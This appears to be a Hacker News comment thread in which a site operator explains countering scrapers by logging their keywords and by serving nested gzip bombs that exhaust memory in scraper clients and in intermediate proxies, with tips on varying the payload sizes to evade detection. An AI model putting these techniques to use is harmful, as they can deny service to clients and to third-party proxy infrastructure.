Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> Interesting. What does number 5 do?

LLMs that are implemented in a manner like this to offer web scraping capabilities usually try to replace web scraper interaction with the website in a programmable manner. There's bunch of different wordings of prompts, of course, depending on the service. But the idea is that you as a being-scraped-to-death server learn to know what people are scraping your website for in regards to the keywords. This way you at least learn something about the reason why you are being scraped, and can manage/adapt accordingly on your website's structure and sitemap.

> how do gzip bombs works, does it automatically extract to the 20gb or the bot has to initiate the extraction?

The point behind it is that it's unlikely that script kiddies wrote their own HTTP parser that detects gzip bombs, and are reusing a tech stack or library that's made for the task at hand, e.g. python's libsoup to parse content, or go's net/http, or php's curl bindings etc.

A nested gzip bomb has the effect that it targets both the client and the proxy in between, whereas the proxy (targeted via Transfer-Encoding) has to unpack around ~2ish GB of memory until it can process the request, and parse the content to serve it to its client. The client (targeted via Content-Encoding) has to unpack ~20GB of gzip into memory before it can process the content, realizing that it's basically only null bytes.

The idea is that a script kiddie's scraper script won't account for this, and in the process DDoS the proxy, which in return will block the client for violations of ToS of that web scraping / residential IP range provider.

The awesome part behind gzip is that the size of the final container / gzip bomb is varying, meaning that the null bytes length can just be increased by say, 10GB + 1 byte, for example, and make it undetectable again. In my case I have just 100 different ~100kB files laying around on the filesystem that I serve in a randomized manner and that I serve directly from filesystem cache to not need CPU time for the generation.

You can actually go further and use Transfer-Encoding: chunked in other languages that allow parallelization via processes, goroutines or threads, and have nested nested nested gzip bombs with various byte sizes so they're undetectable until concated together on the other side :)



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: